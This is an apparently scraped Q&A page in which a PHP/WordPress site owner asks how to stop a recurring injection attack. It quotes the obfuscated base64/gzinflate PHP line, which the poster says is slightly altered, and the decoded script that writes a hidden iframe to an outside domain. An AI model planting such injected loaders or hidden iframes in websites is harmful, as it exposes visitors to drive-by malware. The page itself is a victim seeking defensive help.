Logo Questions Linux Laravel Mysql Ubuntu Git Menu
HTML CSS JAVASCRIPT SQL PYTHON PHP BOOTSTRAP JAVA JQUERY R React Kotlin
 

Website iframe attack - inserts code into source

Tags:

php

iframe

code-injection

Over the last few days, my website has repeatedly been the target of an iframe attack. The code is appended mainly to PHP and Javascript pages. The code is then PHP base 64 encoded, see example (I've changed the code slightly to neutralise it):

#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8    VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#

This decoded looks something like this:

<script type="text/javascript">
    document.write(
        '<iframe src="http://opticmoxie.com/xxxxxxx.php"     
         name="Twitter" scrolling="auto" frameborder="no" 
         align="center" height="2" width="2"></iframe>'
    );

The one thing in common is that all the code has the comment "#c3284d#" so tracking down the malicious code is not difficult. But it is time consuming...

We're on a shared server at Gradwell (UK) and they have not been particularly helpful. So the question is what can I do to stop this issue from repeating itself? I am aware of MySQL Injection attacks and use PHP's mysql_real_escape_string to guard against such attacks.

The site is PHP and MySQL drive. We use MySQLFTP and have a shell account for SSH access. We use Wordpress (latest update with plugins de-activated).

like image 981
Mark Avatar asked Jul 11 '12 07:07

Mark

People also ask

Is iFrame a security risk?

The iFrame contains a malicious form that can lead the user to submit sensitive information. This threat can be solved by using sandbox with removing allow-forms . The iFrame may unintentionally download malware to the user's computer.

What is iFrame injection attack?

An iFrame injection XSS is a common cross-site scripting attack that combines malicious JavaScript with an iframe that loads a legitimate page in an effort to steal data from an unsuspecting user. This attack is usually only successful when combined with social engineering.

How do I see other websites on my website?

The easiest way to embed HTML5 project into your web page is using an iframe (inline frame). Iframe is just a very simple HTML code that used to display content from another source into a web page. If you know copy and paste, you can do it. The src attribute specifies the URL (web address) of the inline frame page.

1 Answers

I had the same issue. The FTP server's access logs showed that the modifications were made using a hacked FTP password.

like image 84
abaumg Avatar answered Oct 25 '22 01:10

abaumg
Sign in to Comment

Related questions

Is it possible to retrieve the original headers from a forwarded email in php
How to transform a string to lowercase with preg_replace
PHP - How to access a deep array's contents, building the path to it dynamically
Sendmail issue: successfully sent but never arrives
When to use time_nanosleep?
http:// Becomes http%3A%2F%2F in CodeIgniter
How to serve a .dmg file via PHP/readfile?
How to create a success message within a div upon successful form submission?
Websockets unresolvable "received unexpected continuation frame" error
jQuery Ajax: pdf response
Running a Python script on a PHP server
PHP PDO - cannot serialize or unserialize PDO instances
PHP Regex to split an SQL field list
Arrays from multiple upload form, Upload images then insert to database (PHP, MySQL)
What's the most efficient way of creating dynamic page body? [closed]
Paypal error: user is not allowed to perform this action
MySQL concurrent multi-row inserts - Insert ID Assumption
Replace " ’ " with " ' " in PHP
Convert double to string in php
Push data to page without checking periodically for it?

Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!